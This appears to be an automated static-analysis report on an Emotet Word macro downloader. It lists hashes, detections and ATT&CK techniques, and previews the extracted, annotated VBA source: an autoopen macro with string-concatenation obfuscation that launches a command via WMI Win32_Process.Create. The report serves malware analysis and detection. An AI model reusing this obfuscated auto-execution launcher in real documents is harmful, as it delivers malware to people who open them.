Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 754aad397218f016…

MALICIOUS

Office (OLE)

132.2 KB Created: 2019-05-29 13:20:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: c75681c5bc5d436e9a93e044686152c5 SHA-1: 092944cc08585638609519394112fd1513ece571 SHA-256: 754aad397218f016deea4340aa68c3ef2b46d90cd7a218d53cb2c4a5efcba23d
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1137.001 Office Application Startup: VBA

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-10001946-0. Static analysis reveals the presence of VBA macros, including an autoopen macro, which is a common technique for Emotet. Crucially, the macros utilize `CreateObject` to launch `Win32_Process` via WMI, indicating an attempt to execute a secondary payload. The `autoopen` macro and the `CreateObject` call for WMI process creation are strong indicators of malicious intent.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the legacy Word macro execution surface; on its own it does not attribute the sample to a downloader or to a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5995 bytes
SHA-256: 5d4cad9fe770ba36aad5b61e7a93eb5e917f83422f8111410630cbae9b5a9ae1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "mSRp5U, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "TDDAinJ, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "kmi5rho, 2, 2, MSForms, ComboBox"
' Auto-execution entry point: a Sub named autoopen is run when the document is
' opened (flagged on this page as OLE_VBA_AUTOOPEN / T1137.001). The header is
' split over three lines with "_" continuations, so the annotation sits above it.
Sub _
autoopen( _
)
' The Debug.Print lines (two active, two commented out) only concatenate random
' string literals and write them to the VBE Immediate window. They are padding
' and have no effect on the execution chain.
   'Debug.Print "J2NdVb" + ("401" + ("ZFaBLIHE") + "JGuaIb" + "480") + "rRrrS4QF" + ("wYfuLp") + ("L1zaI3" + "zcaEB2A" + "580" + ("qYHI7Dm") + ("pqWjwuZ" + ("AaIz7p5") + "804" + ("668") + ("GY7ij2" + ("19"))))
Debug.Print "vvwQT_" + ("964" + ("hVnmZj1h") + "YPHYLsc" + "407") + "C7siKrPn" + ("wrQ6BFi") + ("Sp02jc2z" + "c3kNv2s" + "628" + ("lTNpijz") + ("SGJ7bZ" + ("EJBT54") + "8" + ("321") + ("YfEUdaE" + ("254"))))
' The only statement that matters: hands off to zQoAY9 (module NNEuOcz, later in
' this listing), which assembles the WMI moniker and calls Win32_Process.Create.
zQoAY9
   'Debug.Print "tXYb_4p" + ("77" + ("nC6Wvrf") + "VG8nh2Vo" + "429") + "nivKO_D5" + ("NoPOMQz") + ("M8Ajkb8" + "ioOOKOqN" + "286" + ("nnlsGK") + ("VVkjA3qw" + ("ItSQNT") + "225" + ("371") + ("Bi00Bjw" + ("620"))))
Debug.Print "Va_QUj" + ("9" + ("Tfa7LH") + "ZaSiuJ0p" + "869") + "bfDCccm" + ("B8rSIJo_") + ("o3_qTMC" + "NAlcJZjt" + "308" + ("YkWSwjtA") + ("a_DQkuh" + ("rZo8itbi") + "540" + ("889") + ("RinINfr" + ("883"))))
End Sub


Attribute VB_Name = "ZwnVj8f"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "iWVonii"

Attribute VB_Name = "mL1BzLs"

Attribute VB_Name = "RaEc_4X"

Attribute VB_Name = "YzuOl2cL"

Attribute VB_Name = "HXA_3V"

Attribute VB_Name = "oKGSVX"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "NNEuOcz"
' Called from autoopen in ThisDocument. Builds the command line from three form
' controls and launches it through WMI. Returns nothing meaningful.
Function zQoAY9()
' Debug.Print padding, as in autoopen: random literals printed to the Immediate
' window, no effect on the execution chain.
   'Debug.Print "tIWEIH" + ("689" + ("LCBJPOW") + "k94Ecajj" + "875") + "zwX2uEaz" + ("Rz4uV7i0") + ("uVi9DV" + "wjjP7uoc" + "669" + ("JzkSGWI") + ("Ff0lFs7" + ("VwYRt2") + "845" + ("303") + ("HG4QXilP" + ("328"))))
Debug.Print "i6Vckbl" + ("961" + ("qBOPWC") + "lcwQP2" + "234") + "iDfdlj" + ("uCzJaPV8") + ("DoABjqJ" + "hUqiOWM" + "8" + ("mNcbad_") + ("PMcUjjKk" + ("bzU_0Jf") + "215" + ("555") + ("LPbS8ImN" + ("591"))))
' The command line is NOT present in the macro source. It is the concatenation
' of the values held by the three MSForms ComboBox controls (TDDAinJ, kmi5rho,
' mSRp5U) declared via VB_Control on ThisDocument. Recovering the actual command
' means reading those control values from the document's form data, not the
' decoded VBA source shown here.
k6S9Oijw = ThisDocument.TDDAinJ + ThisDocument.kmi5rho + ThisDocument.mSRp5U
   'Debug.Print "DDNcJ9" + ("504" + ("UWaXlSh") + "VJ20I3J" + "977") + "Yad9u7" + ("ZHwhl_") + ("sYq4QXN" + "GOF6VS" + "181" + ("FG7Zqca") + ("ph4j30" + ("nSrwGN") + "893" + ("702") + ("DJJ1nIK4" + ("908"))))
Debug.Print "lOcCUaC" + ("371" + ("GZVh4tn") + "CsEvVE59" + "914") + "zD1iDEO" + ("p3UCU9vw") + ("Vh4Bovod" + "WcHnLYDk" + "796" + ("Z3OFLXCb") + ("FpLU3G" + ("oZlHwW") + "344" + ("739") + ("z5LA177q" + ("654"))))
' WMI process launch (OLE_VBA_WMI_PROCESS_CREATE). The moniker is assembled at
' runtime as "winmg" + "mts:Win" + "32_Process" = "winmgmts:Win32_Process",
' split across literals and "_" continuations — presumably to defeat literal
' string matching, so detection should key on the concatenated moniker or on
' the runtime CreateObject/.Create call. The first argument to Create is the
' assembled command line (k6S9Oijw). nBhMkp is a Function in module fvpzIts
' (truncated below); fCtpUw8 and OAYAEN are not defined anywhere in the visible
' listing — presumably undeclared (Empty) variables used as filler arguments.
' The "#" after Create looks like a stray type-declaration character —
' presumably also noise; confirm against the raw p-code if it matters.
CreateObject(("winmg" _
+ "mts:Win" + _
"32_Process")).Create# k6S9Oijw, fCtpUw8, nBhMkp, OAYAEN
   'Debug.Print "MnzmVFD" + ("536" + ("i9tqXAK") + "dGha2_IY" + "495") + "j89Wiwt" + ("H6KDhJ") + ("w5ozSCoi" + "wmNsji" + "251" + ("zWMkRhcp") + ("Y5rDNdlZ" + ("vUzwlvA") + "961" + ("438") + ("pob8ktUW" + ("278"))))
Debug.Print "wmOUSj_" + ("237" + ("Yfzpib") + "bfOTQqP" + "249") + "mRCfjhW" + ("Ocb9MXm") + ("jSCSU1" + "IpWiECd" + "369" + ("B07STV5t") + ("bB8pWF" + ("ib9NvNXr") + "842" + ("976") + ("zlsrkVN" + ("327"))))
End Function


Attribute VB_Name = "fvpzIts"
Function nBhMkp()
   'Debug.Print "JHGz4AY" + ("364" + ("joWJTq") + "jRU6X5" + "459") + "NXihaij" + ("uj7nkY") + ("lt1TwZ" + "GMSQvNWM" + "419" + ("fzQJ2iOz") + ("Cs89LK" + ("Oi0wzSSN") + "348" + ("340") + ("mNcZWZ" + ("470"))))
Debug.Print "ohmjiFfW" + ("298" + ("jVJnB1") + "tnM5HHd1" + "254") + "psK3f9W" + ("Kw3Dzn") + ("DzXjZfr" + "hfZFPPz" + "694" + ("Xdpqqkw") + ("nJGilE" + ("IFYMif6") + "303" + ("855") + ("zjCW
... (truncated)